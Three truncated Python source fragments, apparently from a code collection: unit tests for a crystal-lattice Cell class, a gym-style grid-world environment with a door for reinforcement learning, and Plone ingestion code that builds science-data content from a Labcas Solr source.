_latt = [[5.0, 0.0],
[0.0, 5.0, 0.0],
[0.0, 0.0, 5.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
def test_bad_atoms_pos(self):
_latt = [[5.0, 0.0, 0.0],
[0.0, 5.0, 0.0],
[0.0, 0.0, 5.0]]
_atoms = []
_pos = [[0.0, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_atoms = ["C"]
_pos = [0.0, 0.0, 0.0]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_atoms = ["C"]
_pos = [[0.0, 0.0, 0.0], [0.1, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_atoms = ["C", "C"]
_pos = [[0.0, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
class cell_factory_method(ut.TestCase):
'''Test the class methods to generate commonly used lattice structure'''
def test_bravais_cubic(self):
_pc = Cell.bravais_cP("C", a=5.0, coordSys="D")
self.assertEqual(1, len(_pc))
self.assertEqual("D", _pc.coordSys)
_bcc = Cell.bravais_cI("C", a=5.0, primitive=False, unit="au")
self.assertEqual("au", _bcc.unit)
self.assertEqual(2, len(_bcc))
_fcc = Cell.bravais_cF("C", a=5.0, primitive=False)
self.assertEqual(4, len(_fcc))
# primitive cell
_pbcc = Cell.bravais_cI("C", a=5.0, primitive=True)
self.assertEqual(1, len(_pbcc))
self.assertAlmostEqual(5.0*np.sqrt(3.0)/2.0, _pbcc.alen[0])
_pfcc = Cell.bravais_cF("C", a=5.0, primitive=True)
self.assertEqual(1, len(_pfcc))
self.assertAlmostEqual(5.0*np.sqrt(0.5), _pfcc.alen[0])
def test_bravais_orth(self):
oP = Cell.bravais_oP("C", a=1.0, b=2.0, c=3.0)
self.assertEqual(len(oP), 1)
self.assertEqual(oP.vol, 6.0)
oI = Cell.bravais_oI("C")
self.assertEqual(len(oI), 2)
oF = Cell.bravais_oF("C")
self.assertEqual(len(oF), 4)
def test_typical_sysmtes(self):
# both conventional and primitive
for p in [True, False]:
Cell.diamond("C", primitive=p)
Cell.anatase("Ti", "O", primitive=p)
Cell.rutile("Ti", "O", primitive=p)
Cell.zincblende("Zn", "O", primitive=p)
# primitive only
Cell.perovskite("Ca", "Ti", "O")
Cell.wurtzite("Zn", "O")
Cell.pyrite()
Cell.marcasite()
def test_read_from_json(self):
import os
import tempfile
import json
self.assertRaisesRegex(CellError, "JSON file not found: None",
Cell.read_from_json, None)
self.assertRaisesRegex(CellError, "JSON file not found: /abcdefg.json",
Cell.read_from_json, "/abcdefg.json")
# raise for invalid json
_tf = tempfile.NamedTemporaryFile()
with open(_tf.name, 'w') as h:
json.dump({}, h)
self.assertRaisesRegex(CellError, "invalid JSON file for cell: {}".format(_tf.name),
Cell.read_from_json, _tf.name)
_dict = {"latt": [[5.0, 0.0, 0.0], [0.0, 5.0, 0.0], [0.0, 0.0, 5.0]]}
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
self.assertRaisesRegex(CellError, "invalid JSON file for cell: {}. No {}".format(_tf.name, "atoms"),
Cell.read_from_json, _tf.name)
_dict = {
"latt": [[5.0, 0.0, 0.0], [0.0, 5.0, 0.0], [0.0, 0.0, 5.0]],
"atoms": ["C"],
}
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
self.assertRaisesRegex(CellError, "invalid JSON file for cell: {}. No {}".format(_tf.name, "pos"),
Cell.read_from_json, _tf.name)
# JSON with factory key
_dict = {
"factory": "zincblende",
"atom1": "Zn",
"a": 8.0, "unit": "au",
}
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
self.assertRaisesRegex(CellError, "Required key not found in JSON: atom2",
Cell.read_from_json, _tf.name)
# add atom2 and dump again
_dict["atom2"] = "O"
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
_cell = Cell.read_from_json(_tf.name)
self.assertEqual(_cell.unit, 'au')
self.assertEqual(_cell.comment, "Zincblende ZnO")
self.assertAlmostEqual(512, _cell.vol)
_tf.close()
# test one file in testdata, Cell_1.json is tested here
_path = os.path.join(os.path.dirname(__file__),
'..', 'testdata', 'Cell_1.json')
_cell = Cell.read_from_json(_path)
self.assertEqual(_cell.unit, "ang")
self.assertEqual(_cell.coordSys, "D")
self.assertEqual(_cell.natoms, 2)
self.assertListEqual(_cell.atoms, ["C", "C"])
def test_read_from_cif(self):
dataDir = os.path.join(get_dirpath(__file__), '..', 'testdata')
for fn in os.listdir(dataDir):
if fn.endswith('.cif'):
cif = os.path.join(dataDir, fn)
Cell.read_from_cif(cif)
class cell_select_dynamics(ut.TestCase):
'''Test the functionality of selective dynamics
'''
def test_fix_all(self):
_c = Cell.bravais_cP("C")
self.assertFalse(_c.useSelDyn)
_c = Cell.bravais_cP("C", allRelax=False)
self.assertTrue(_c.useSelDyn)
self.assertListEqual([False, ]*3, _c.sdFlags(0))
_c = Cell.bravais_cI("C", allRelax=False, primitive=False)
self.assertTrue(_c.useSelDyn)
self.assertListEqual([[False, ]*3, ]*2, _c.sdFlags())
def test_relax_all(self):
_c = Cell.bravais_cI("C", allRelax=False, primitive=False,
selectDyn={1: [True, False, True]})
_c.relax_all()
self.assertListEqual(_c.sdFlags(1), [True, True, True])
self.assertFalse(_c.useSelDyn)
def test_fix_some(self):
_pc = Cell.bravais_cF("C", selectDyn={1: [False, True, True]})
self.assertListEqual([True, ]*3, _pc.sdFlags(0))
self.assertListEqual([False, True, True, ], _pc.sdFlags(1))
def test_fix_by_set_method(self):
_pc = Cell.bravais_cF("C")
_pc.set_fix(0, 1)
self.assertListEqual([False, False, False], _pc.sdFlags(0))
self.assertListEqual([False, False, False], _pc.sdFlags(1))
_pc.set_fix(2, axis=1)
self.assertListEqual([False, True, True], _pc.sdFlags(2))
_pc.set_fix(3, axis=[2, 3])
self.assertListEqual([True, False, False], _pc.sdFlags(3))
def test_relax_by_set_method(self):
_pc = Cell.bravais_cF("C", allRelax=False)
_pc.set_relax(0, 1)
self.assertListEqual([True, True, True], _pc.sdFlags(0))
self.assertListEqual([True, True, True], _pc.sdFlags(1))
_pc.set_relax(2, axis=1)
self.assertListEqual([True, False, False], _pc.sdFlags(2))
_pc.set_relax(3, axis=[2, 3])
self.assertListEqual([False, True, True], _pc.sdFlags(3))
class cell_sort(ut.TestCase):
'''Test the sorting functionality of Cell
'''
def test_direct_switch_cscl(self):
_latt = [[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]]
_atoms = ["Cl", "Cs"]
_pos = [[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]]
# Cs atom is fixed
_fix = [False, False, False]
_cell = Cell(_latt, _atoms, _pos, selectDyn={1: _fix})
self.assertListEqual([0], _cell.get_sym_index("Cl"))
self.assertListEqual([0], _cell["Cl"])
self.assertListEqual([1], _cell.get_sym_index("Cs"))
self.assertListEqual([1], _cell["Cs"])
_cell._switch_two_atom_index(0, 1)
self.assertListEqual(_cell.atoms, ["Cs", "Cl"])
self.assertListEqual([0], _cell.get_sym_index("Cs"))
self.assertListEqual([1], _cell.get_sym_index("Cl"))
self.assertListEqual(_fix, _cell.sdFlags(0))
def test_sanitize_atoms_sic(self):
_latt = [[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]]
_atoms = ["Si", "C", "Si", "Si", "C", "C", "Si", "C"]
_pos = [[0.0, 0.0, 0.0], # Si
[0.25, 0.25, 0.25], # C
[0.0, 0.5, 0.5], # Si
[0.5, 0.0, 0.5], # Si
[0.25, 0.75, 0.75], # C
[0.75, 0.25, 0.75], # C
[0.5, 0.5, 0.0], # Si
[0.75, 0.75, 0.25]] # C
_posSanitied = [[0.0, 0.0, 0.0], # Si
[0.0, 0.5, 0.5], # Si
[0.5, 0.0, 0.5], # Si
[0.5, 0.5, 0.0], # Si
[0.25, 0.25, 0.25], # C
[0.25, 0.75, 0.75], # C
[0.75, 0.25, 0.75], # C
[0.75, 0.75, 0.25]] # C
SiC = Cell(_latt, _atoms, _pos,
selectDyn={2: [False, False, False]})
# _latt._sanitize_atoms()
self.assertListEqual(list(sorted(_atoms, reverse=True)),
SiC.atoms)
self.assertDictEqual({0: 'Si', 1: 'C'}, SiC.typeMapping)
self.assertTrue(np.array_equal(SiC.pos,
np.array(_posSanitied, dtype=SiC._dtype)))
self.assertListEqual([False, False, False], SiC.sdFlags(1))
def test_sort_pos_sic(self):
'''Test sorting atoms and their positions in SiC
'''
_latt = [[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]]
_atoms = ["Si", "Si", "Si", "Si", "C", "C", "C", "C"]
_pos = [[0.0, 0.0, 0.0], # Si
[0.0, 0.5, 0.5], # Si
[0.5, 0.0, 0.5], # Si
[0.5, 0.5, 0.0], # Si
[0.25, 0.25, 0.25], # C
[0.25, 0.75, 0.75], # C
[0.75, 0.25, 0.75], # C
[0.75, 0.75, 0.25]] # C
_posSorted = [0.5, 0.5, 0.0, 0.0, 0.75, 0.75, 0.25, 0.25]
_posSortedRev = [0.0, 0.0, 0.5, 0.5, 0.25, 0.25, 0.75, 0.75]
SiC = Cell(_latt, _atoms, _pos)
# no need to sanitize atoms
self.assertListEqual(_atoms, SiC.atoms)
self.assertDictEqual({0: 'Si', 1: 'C'}, SiC.typeMapping)
for _axis in range(3):
SiC.sort_pos(axis=_axis+1)
self.assertTrue(np.array_equal(np.array(_posSorted, dtype=SiC._dtype),
SiC.pos[:, _axis]))
SiC.sort_pos(axis=_axis+1, reverse=True)
self.assertTrue(np.array_equal(np.array(_posSortedRev, dtype=SiC._dtype),
SiC.pos[:, _axis]))
class test_cell_manipulation(ut.TestCase):
'''Test manipulation methods for lattice and atoms
'''
def test_add_atom_on_graphene(self):
'''Test adding atoms in a graphene cell
'''
a = 5.2
_latt = [[a/2, 0.0, 0.0],
[-a/2, a/2*np.sqrt(3.0), 0.0],
[0.0, 0.0, 15.0]]
_atoms = ["C", "C", ]
_pos = [[0.0, 0.0, 0.5],
[1.0/3, 2.0/3, 0.5], ]
gp = Cell(_latt, _atoms, _pos)
self.assertRaisesRegex(CellError,
r"Invalid coordinate: *",
gp.add_atom, "H", [0.2, 0.3])
self.assertRaisesRegex(CellError,
"atom should be string, received <class 'int'>",
gp.add_atom, 1, [0.2, 0.3, 0.4])
gp.fix_all()
gp.add_atom("H", [0.0, 0.0, 0.6], sdFlag=[False, False, True])
self.assertEqual(gp.natoms, 3)
self.assertListEqual(gp.atoms, ['C', 'C', 'H'])
self.assertDictEqual(gp.typeMapping, {0: 'C', 1: 'H'})
self.assertListEqual(gp.sdFlags(2), [False, False, True])
def test_atom_arrange_after_add_atom(self):
'''Test if the atoms are correctly rearranged
after adding new atom
'''
a = 2.0
_latt = [[a, 0.0, 0.0],
[0.0, a, 0.0],
[0.0, 0.0, a]]
_atoms = ["Na", "Cl", ]
_pos = [[0.0, | |
import numpy as np
import gym, gym.spaces
import time
import os
from collections import OrderedDict
import yaml
EPS = 1e-5
def parse_config(config):
with open(config, 'r') as f:
config_data = yaml.load(f)
return config_data
class ToyEnv:
def __init__(self,
config_file,
should_normalize_observation=True,
automatic_reset=True,
visualize=False):
self.config = parse_config(config_file)
self.load_map()
# action_space
# base: stop(no-op), turn left, turn right, forward
# arm: stop(no-op), slide up, slide down
self.action_space = gym.spaces.MultiDiscrete([4, 3])
self.direction = {
0: np.array([0, 1]), # facing east
1: np.array([-1, 0]), # facing north
2: np.array([0, -1]), # facing west
3: np.array([1, 0]), # facing south
}
self.num_agent_orientation = len(self.direction)
# door state
self.door_pos = np.array([self.door_row, self.door_col])
self.door_min_state = 1
self.door_max_state = self.config.get('door_max_state', 1)
assert self.door_max_state >= 1, 'door_max_state has to be greater than 0'
# observation_space
self.outputs = self.config.get('outputs', ['global_map'])
self.local_map_range = self.config.get('local_map_range', 5)
assert self.local_map_range % 2 == 1, 'local_map_range has to be an odd number'
observation_space = OrderedDict()
observation_space_min_max = OrderedDict()
if 'sensor' in self.outputs:
self.sensor_dim = 4
# [agent_row, agent_col, agent_theta, door_state]
self.sensor_space = gym.spaces.Box(low=-1.0, high=1.0, shape=(self.sensor_dim,), dtype=np.float32)
observation_space['sensor'] = self.sensor_space
observation_space_min_max['sensor'] = np.array([
[0.0, self.height - 1],
[0.0, self.width - 1],
[-np.pi - EPS, np.pi + EPS],
[self.door_min_state, self.door_max_state],
])
if 'auxiliary_sensor' in self.outputs:
# [sin(agent_theta), cos(agent_theta), target_row, target_col, door_row, door_col,
# is_left_room, is_door_front, is_door_front_and_facing_door,
# target_row_local, target_col_local, door_row_local, door_col_local]
self.auxiliary_sensor_dim = 9
self.auxiliary_sensor_space = gym.spaces.Box(low=-1.0, high=1.0, shape=(self.auxiliary_sensor_dim,),
dtype=np.float32)
observation_space['auxiliary_sensor'] = self.auxiliary_sensor_space
observation_space_min_max['auxiliary_sensor'] = np.array([
[-1.0, 1.0],
[-1.0, 1.0],
[0.0, self.height - 1],
[0.0, self.width - 1],
[0.0, self.height - 1],
[0.0, self.width - 1],
[0.0, 1.0],
[0.0, 1.0],
[0.0, 1.0],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
])
if 'global_map' in self.outputs:
# 3 channels: channel 1: map
# channel 2: robot position and orientation (1, 2, 3, 4), and goal position (-1)
# channel 3: door state 1-5, 5 = open, 1 = closed
self.global_map_space = gym.spaces.Box(low=-1.0, high=1.0,
shape=(3, self.height, self.width),
dtype=np.float32)
observation_space['global_map'] = self.global_map_space
observation_space_min_max['global_map'] = np.array([
[0.0, 2.0],
[-1.0, self.num_agent_orientation + 1],
[0.0, self.door_max_state],
], dtype=np.float).reshape(3, 2, 1)
if 'local_map' in self.outputs:
# ego centric map, doesn't consider rotation
# 4 channels: channel 1: map
# channel 2: robot position and orientation (1, 2, 3, 4), and goal position (-1)
# channel 3: door state 1-5, 5 = open, 1 = closed
# channel 4: validity map, 1 = this position is within the valid range of global map
self.local_map_space = gym.spaces.Box(low=-1.0, high=1.0,
shape=(4, self.local_map_range, self.local_map_range),
dtype=np.float32)
observation_space['local_map'] = self.local_map_space
observation_space_min_max['local_map'] = np.array([
[0.0, 2.0],
[-1.0, self.num_agent_orientation + 1],
[0.0, self.door_max_state],
[0.0, 1.0],
], dtype=np.float).reshape(4, 2, 1)
self.observation_space = gym.spaces.Dict(observation_space)
self.observation_space_min_max = observation_space_min_max
# traversable tiles for random initialization
self.traversable_tiles_left = np.transpose(np.where(self.map[:, :self.door_col] == 0))
self.traversable_tiles_right = np.transpose(np.where(self.map[:, (self.door_col + 1):] == 0))
# termination and reward
self.max_step = self.config.get('max_step', 500)
self.sparse_reward = self.config.get('sparse_reward', False)
# training-related and visualization
self.should_normalize_observation = should_normalize_observation
self.automatic_reset = automatic_reset
self.visualize = visualize
self.reset_env()
def load_map(self):
self.height = self.config.get('height', 7)
self.width = self.config.get('width', 7)
self.door_row = self.config.get('door_row', 3)
self.door_col = self.config.get('door_col', 3)
self.map = np.zeros((self.height, self.width))
self.map[0, :] = 1
self.map[-1, :] = 1
self.map[:, 0] = 1
self.map[:, -1] = 1 # add walls
self.map[:, self.door_col] = 1 # add door wall
self.map[self.door_row, self.door_col] = 2 # add door
def reset(self):
self.reset_env()
return self.get_observation()
def normalize_observation(self, observation):
for key in observation:
if len(observation[key].shape) == 1:
assert np.all(observation[key] >= self.observation_space_min_max[key][:, 0]) and \
np.all(observation[key] <= self.observation_space_min_max[key][:, 1]), \
'observation out of bound: {}'.format(key)
obs_mean = np.mean(self.observation_space_min_max[key], axis=1)
obs_mag = (self.observation_space_min_max[key][:, 1] -
self.observation_space_min_max[key][:, 0]) / 2.0
elif len(observation[key].shape) == 3:
assert np.all(observation[key] >= self.observation_space_min_max[key][:, 0:1, :]) and \
np.all(observation[key] <= self.observation_space_min_max[key][:, 1:2, :]), \
'observation out of bound: {}'.format(observation)
obs_mean = np.mean(self.observation_space_min_max[key], axis=1, keepdims=True)
obs_mag = (self.observation_space_min_max[key][:, 1:2, :] -
self.observation_space_min_max[key][:, 0:1, :]) / 2.0
else:
assert False, 'unexpected observation shape'
observation[key] = (observation[key] - obs_mean) / obs_mag
return observation
def wrap_to_pi(self, theta):
return theta - np.pi * 2 * np.floor((theta + np.pi) / (np.pi * 2))
def get_global_map(self):
global_map = np.zeros((3, self.height, self.width), dtype=np.float32)
global_map[0] = self.map
global_map[1, self.agent_pos[0], self.agent_pos[1]] = self.agent_orientation + 1
global_map[1, self.target_pos[0], self.target_pos[1]] = -1
global_map[2, self.door_pos[0], self.door_pos[1]] = self.door_state
return global_map
def get_observation(self):
observation = OrderedDict()
if 'sensor' in self.outputs:
sensor = np.zeros(self.sensor_dim, dtype=np.float32)
theta = self.wrap_to_pi(self.agent_orientation * np.pi / 2)
sensor[0:2] = self.agent_pos
sensor[2] = theta
sensor[3] = float(self.door_state)
observation['sensor'] = sensor
if 'auxiliary_sensor' in self.outputs:
auxiliary_sensor = np.zeros(self.auxiliary_sensor_dim, dtype=np.float32)
theta = self.wrap_to_pi(self.agent_orientation * np.pi / 2)
auxiliary_sensor[0] = np.sin(theta)
auxiliary_sensor[1] = np.cos(theta)
auxiliary_sensor[2:4] = self.target_pos
auxiliary_sensor[4:6] = self.door_pos
auxiliary_sensor[6] = float(self.agent_pos[1] < self.door_pos[1])
auxiliary_sensor[7] = float(self.agent_pos[0] == self.door_row
and self.agent_pos[1] == (self.door_col - 1))
auxiliary_sensor[8] = float(self.agent_pos[0] == self.door_row
and self.agent_pos[1] == (self.door_col - 1)
and self.agent_orientation == 0)
# rotation_matrix = np.array([[np.cos(-theta), -np.sin(-theta)], [np.sin(-theta), np.cos(-theta)]])
# auxiliary_sensor[9:11] = rotation_matrix.dot(self.target_pos - self.agent_pos)
# auxiliary_sensor[11:13] = rotation_matrix.dot(self.door_pos - self.agent_pos)
observation['auxiliary_sensor'] = auxiliary_sensor
if 'global_map' in self.outputs:
observation['global_map'] = self.get_global_map()
if 'local_map' in self.outputs:
global_map = self.get_global_map()
local_map = np.zeros((4, self.local_map_range, self.local_map_range), dtype=np.float32)
row_start = max(0, self.agent_pos[0] - self.local_map_range // 2)
row_end = min(self.height, self.agent_pos[0] + self.local_map_range // 2 + 1)
col_start = max(0, self.agent_pos[1] - self.local_map_range // 2)
col_end = min(self.width, self.agent_pos[1] + self.local_map_range // 2 + 1)
local_row_start = row_start - (self.agent_pos[0] - self.local_map_range // 2)
local_row_end = local_row_start + (row_end - row_start)
local_col_start = col_start - (self.agent_pos[1] - self.local_map_range // 2)
local_col_end = local_col_start + (col_end - col_start)
local_map[:3, local_row_start:local_row_end, local_col_start:local_col_end] = \
global_map[:, row_start:row_end, col_start:col_end]
local_map[3, local_row_start:local_row_end, local_col_start:local_col_end] = 1
observation['local_map'] = local_map
if self.should_normalize_observation:
observation = self.normalize_observation(observation)
return observation
def get_l1_dist(self, a, b):
return np.sum(np.abs(a - b))
def get_potential(self):
potential = 0.0
# in the left room
if self.agent_pos[1] < self.door_col:
potential += self.get_l1_dist(self.agent_pos, self.door_pos)
potential += self.door_max_state - self.door_state
potential += self.get_l1_dist(self.door_pos, self.target_pos)
# in the right room
else:
potential = self.get_l1_dist(self.agent_pos, self.target_pos)
return potential
def get_reward(self, action):
reward = 0.0
new_normalized_potential = self.get_potential() / self.initial_potential
potential_reward = self.normalized_potential - new_normalized_potential
self.normalized_potential = new_normalized_potential
# new_potential = self.get_potential()
# potential_reward = self.potential - new_potential
# self.potential = new_potential
if not self.sparse_reward:
reward += potential_reward
# slack reward
# reward -= 0.01
reward -= 0.001 * np.sum(action != 0)
if np.array_equal(self.agent_pos, self.target_pos):
success_reward = 10.0
reward += success_reward
return reward
def get_done(self):
done, info = False, {}
if np.array_equal(self.agent_pos, self.target_pos):
done = True
info['success'] = True
elif self.n_step >= self.max_step:
done = True
info['success'] = False
if done:
info['episode_length'] = self.n_step
return done, info
def reset_env(self):
self.agent_pos = self.traversable_tiles_left[np.random.randint(0, len(self.traversable_tiles_left))]
self.agent_orientation = np.random.randint(4)
self.target_pos = self.traversable_tiles_right[np.random.randint(0, len(self.traversable_tiles_right))].copy()
self.target_pos[1] += (self.door_col + 1)
self.door_state = self.door_min_state
self.n_step = 0
self.normalized_potential = 1.0
self.initial_potential = self.get_potential()
# self.potential = self.get_potential()
def simulation_step(self, action):
# locomotion
if action[0] == 1: # turn left
self.agent_orientation = (self.agent_orientation + 1) % self.num_agent_orientation
elif action[0] == 2: # turn right
self.agent_orientation = (self.agent_orientation - 1) % self.num_agent_orientation
elif action[0] == 3: # move forward
next_pos = self.agent_pos + self.direction[self.agent_orientation]
empty_space = self.map[next_pos[0], next_pos[1]] == 0
open_door = self.map[next_pos[0], next_pos[1]] == 2 and self.door_state == self.door_max_state
if empty_space or open_door:
self.agent_pos = next_pos
# manipulation
if action[1] == 1 or action[1] == 2:
next_pos = self.agent_pos + self.direction[self.agent_orientation]
if self.map[next_pos[0], next_pos[1]] == 2: # door
if action[1] == 1:
self.door_state += 1
else:
self.door_state -= 1
self.door_state = np.clip(self.door_state, self.door_min_state, self.door_max_state)
def step(self, action):
self.n_step += 1
if self.visualize:
self.print_observation()
self.simulation_step(action)
if self.visualize:
self.print_action(action)
self.print_observation()
time.sleep(1)
os.system('clear')
observation = self.get_observation()
reward = self.get_reward(action)
done, info = self.get_done()
if done and self.automatic_reset:
info['last_observation'] = observation
observation = self.reset()
return observation, reward, done, info
def print_action(self, action):
action_mapping = [
{
0: 'no op',
1: 'turn left',
2: 'turn right',
3: 'move forward',
},
{
0: 'no op',
1: 'slide up',
2: 'slide down'
}
]
for v, m in zip(action, action_mapping):
print(m[v])
def print_observation(self):
vis_map = | |
<reponame>MCLConsortium/jpl.mcl.site.sciencedata
# encoding: utf-8
u'''MCL — Base classes'''
from . import MESSAGE_FACTORY as _
from .interfaces import IIngestor
from ._utils import IngestResults, publish
from .errors import IngestDisabled, RDFTypeMismatchError, TitlePredicateMissing, IngestError
from Acquisition import aq_inner
from five import grok
from plone.supermodel import model
from plone.dexterity.utils import createContentInContainer
from zope import schema
from mysolr import Solr
import rdflib, plone.api, logging
_logger = logging.getLogger(__name__)
DC_ID = 'id'
class IIngestableFolder(model.Schema):
u'''An abstract base class for folders whose content can be created via ingestion from RDF.'''
title = schema.TextLine(
title=_(u'Title'),
description=_(u'The name of this folder.'),
required=True
)
description = schema.Text(
title=_(u'Description'),
description=_(u'A brief description of this folder.'),
required=False
)
labcasurl = schema.URI(
title=_(u'Labcas Solr URL'),
description=_(u'Uniform Resource Locator to the Solr source of labcas data.'),
required=True
)
labcas_sourceurl_prefix = schema.URI(
title=_(u'Labcas URL Prefix'),
description=_(u'Uniform Resource Locator prefix to the full url of the Labcas data page.'),
required=True
)
ingestEnabled = schema.Bool(
title=_(u'Ingest Enabled'),
description=_(u'True if this folder should update its contents during routine ingest.'),
required=False
)
class IngestableFolderView(grok.View):
grok.context(IIngestableFolder)
grok.require('zope2.View')
grok.baseclass()
def isManager(self):
context = aq_inner(self.context)
membership = plone.api.portal.get_tool('portal_membership')
return membership.checkPermission('Manage Portal', context)
def contents(self):
context = aq_inner(self.context)
catalog = plone.api.portal.get_tool('portal_catalog')
return catalog(path={'query': '/'.join(context.getPhysicalPath()), 'depth': 1}, sort_on='sortable_title')
class IScienceDataObject(model.Schema):
u'''An abstract base class for content that are identified by RDF subject URIs.'''
subjectURI = schema.URI(
title=_(u'Subject URI'),
description=_(u"Uniform Resource Identifier that identifies the subject of this object.'"),
required=True,
)
class Ingestor(grok.Adapter):
grok.provides(IIngestor)
grok.context(IIngestableFolder)
def getContainedObjectInterface(self):
u'''Return the interface for objects that should be contained in the
folder that this class adapts.'''
raise NotImplementedError(u'Subclasses must implement getContainedObjectInterface')
def getTitle(self, predicates):
u'''Get the DC title from the given ``predicates``. Subclasses may
override this.'''
return predicates.get(DC_ID)
def _checkPredicates(self, predicates):
u'''Check the given ``predicates`` to see if they make sense for the
kinds of objects we'll be creating. If not, raise an exception. But
if so, return the type's interface, the factory type info, the
predicate map, and the object's title.'''
iface = self.getContainedObjectInterface() # Content type's interface
fti = iface.getTaggedValue('fti') # Factory Type Information
predicateMap = iface.getTaggedValue('predicateMap') # Mapping RDF predicate to content's field name
desiredType = iface.getTaggedValue('typeValue') # RDF type URI that we want
types = predicates.get(iface.getTaggedValue('typeKey')) # ingest type that we're given
title = self.getTitle(predicates) # Get the object's title
if types:
if desiredType in types: # Do we have the right json type?
return iface, fti, predicateMap, unicode(title) # Done!
return None, None, None, None
def _setValue(self, obj, fti, iface, predicate, predicateMap, values):
u'''On the object ``obj`` set the field indicated by ``predicate``
(which we can find via the ``predicateMap``) to the given ``values``.
We can indicate a problem with the named ``fti`` and can access fields
by the given ``iface``.
'''
catalog = plone.api.portal.get_tool('portal_catalog')
fieldName, isRef, urlprefix = predicateMap[unicode(predicate)]
if not values:
_logger.info(
u'For type %s we want predicate %s but not given; leaving %s un-set',
fti, predicate, fieldName
)
return
field = iface.get(fieldName) # Get the field out of the content interface
fieldBinding = field.bind(obj) # Bind that field to the content object
if isRef: # Is this a reference field?
items = [i.getObject() for i in catalog(subjectURI=[urlprefix+s for s in values])] # Find matching objects
if len(items) != len(values): # Find them all?
_logger.info(
u'For type %s predicate %s linked to %d URIs, but only %d found',
fti, predicate, len(values), len(items)
)
if schema.interfaces.ICollection.providedBy(field): # Multi reference?
fieldBinding.set(obj, items) # Yes, set them all
elif len(items) > 0: # Single reference and we have an item?
fieldBinding.set(obj, items) # Set single value
else: # It's a non-reference field
if schema.interfaces.ICollection.providedBy(field): # Is it multi valued?
fieldBinding.validate(values) # Yes, validate all the values
fieldBinding.set(obj, values) # And set all the values
else: # No, it's not multi valued
fieldBinding.validate(values[0]) # Validate just one value
fieldBinding.set(obj, values[0]) # And set just one value
def createObjects(self, context, uris, statements):
u'''Create new objects in the ``context`` identified by ``uris`` and
described in the ``statements``. Return a sequence of those newly
created objects. Subclasses may override this for special ingest
needs.'''
createdObjects = []
# For each subject URI in the RDF
for uri in uris:
# Get the predicates for just that subject
predicates = statements[uri]
try:
# Get the content type's interface, factory type info,
# mapping of predicates to fields, and the title
iface, fti, predicateMap, title = self._checkPredicates(predicates)
if not iface:
continue
except IngestError as ex:
_logger.exception(u'Ingest error on %s: %r; skipping %s', u'/'.join(context.getPhysicalPath()), ex, uri)
continue
# Create a brand new content object
obj = createContentInContainer(context, fti, title=title, subjectURI=unicode(uri))
# Now set its fields
for predicate in predicateMap:
values = predicates.get(predicate) # Get the values
if not values: continue # Skip if empty
if isinstance(values, basestring):
values = [values]
values = [unicode(i) for i in values] # Convert Literal+URIRefs to unicode
try:
self._setValue(obj, fti, iface, predicate, predicateMap, values)
except schema.ValidationError:
_logger.exception(u'Data "%r" for field %s invalid; skipping', values, predicate)
continue
publish(obj)
obj.reindexObject()
createdObjects.append(obj)
return createdObjects
def updateObjects(self, context, uris, brains, statements):
u'''Update those objects in ``context`` that have matching ``uris`` by
using the ``statements`` to determine what needs updating. To quickly
find those objects, there's a lookup table ``brains`` that maps from
subject URI to a portal catalog brain. Subclasses may override this
for special ingest needs.'''
updatedObjects = [] # Start w/no updated objs
for uri in uris: # For each subject URI
brain = brains[uri] # Get matching brain
obj = brain.getObject() # Get matching object
predicates = statements[uri] # Subject-specific preds
objectUpdated = False # Assume no update
iface, fti, predicateMap, title = self._checkPredicates(predicates) # Get usual suspects
for predicate, (fieldName, isRef, urlprefix) in predicateMap.iteritems(): # For each pred+field name
field = iface.get(fieldName) # Get the field
fieldBinding = field.bind(obj) # Bind it to the obj
newValues = predicates.get(rdflib.URIRef(predicate), []) # Get new values
if isinstance(newValues, basestring):
newValues = [newValues]
newValues = [unicode(i) for i in newValues] # Literals to unicodes
if isRef: # Is this a reference?
currentRefs = [i.subjectURI for i in fieldBinding.get(obj)] # Get cur ref'd sub URIs
currentRefs.sort() # Sort 'em
newValues.sort() # Sort the new ones, too
if currentRefs != newValues: # Any change?
self._setValue(obj, fti, iface, predicate, predicateMap, newValues) # Yup, update
objectUpdated = True # We changed
else: # Literal field
currentValues = fieldBinding.get(obj) # Get current values
if schema.interfaces.ICollection.providedBy(field): # Multi-valued field?
if currentValues != newValues: # Values different?
self._setValue(obj, fti, iface, predicate, predicateMap, newValues) # Yep, set new values
objectUpdated = True # We updated the obj
else: # Single-valued field
if currentValues != newValues[0]: # Value different?
self._setValue(obj, fti, iface, predicate, predicateMap, newValues) # Set thew new value
objectUpdated = True # We updated the obj
if objectUpdated: # Did we update the obj?
obj.reindexObject() # Yep, reindex it
updatedObjects.append(obj) # Add it to the list
return updatedObjects # We updated these objs
def ingest(self):
u'''Ingest'''
context = aq_inner(self.context) # Get our container
if not context.ingestEnabled: raise IngestDisabled(context) # Do we ingest?
catalog = plone.api.portal.get_tool('portal_catalog') # Get the catalog
statements = self._readLabcasSolr(context.labcasurl, context.labcas_sourceurl_prefix) # Read the RDF
# Find out what we currently contain
results = catalog(
object_provides=IScienceDataObject.__identifier__,
path=dict(query='/'.join(context.getPhysicalPath()), depth=1)
)
# Make a lookup table from those current brains' subjectURIs to the brains
existingBrains = {}
for i in results:
uri = i['subjectURI'].decode('utf-8')
existingBrains[rdflib.URIRef(uri)] = i
existingURIs = set(existingBrains.keys()) # Set of currently existing URIs in the context
statementURIs = set(statements.keys()) # Set of URIs in the newly read RDF
newURIs = statementURIs - existingURIs # Set of URIs for brand new objects
deadURIs = existingURIs - statementURIs # Set of URIs for objects to delete
